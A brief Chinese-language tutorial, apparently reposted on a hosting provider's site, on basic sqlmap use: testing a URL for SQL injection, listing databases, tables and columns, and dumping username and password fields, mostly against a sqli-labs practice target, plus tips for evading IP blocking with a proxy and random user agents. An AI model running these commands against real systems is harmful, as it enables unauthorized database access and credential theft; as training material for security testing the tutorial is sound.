高防服务器

sqlmap基本使用

Mysql数据库
1、先检测是否可以注入,先判断是否可以正常注入:

sqlmap -u url -v 3

里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题

对于某些今天url可以在/a/b.html尝试加入号来进行此路径内的检测

2、爆库

sqlmap.py -u http://sqli-labs-master/Less-… -v 3 –dbs –batch

3、根据爆出来的库查表

sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” –tables –batch

4、根据表查字段

sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” -T “users” –columns –batch

5、根据字段查值

sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” -T “users” -C “username,password” –dump –batch

防止被IP拦截的操作,random-agent让请求头随机:

可以在后面增加–proxy http://127.0.0.1:8080 –random-agent -v 3

Access
对于Access数据库,直接报表就OK

sqlmap -u “http://192.168.96.16/shownews.asp?id=23” –tables

sqlmap里面的字典位置,内置字典位置为,可以根据自己的需要更改,对于Access一般就是直接暴库

sqlmapdatatxt

[温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]

[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]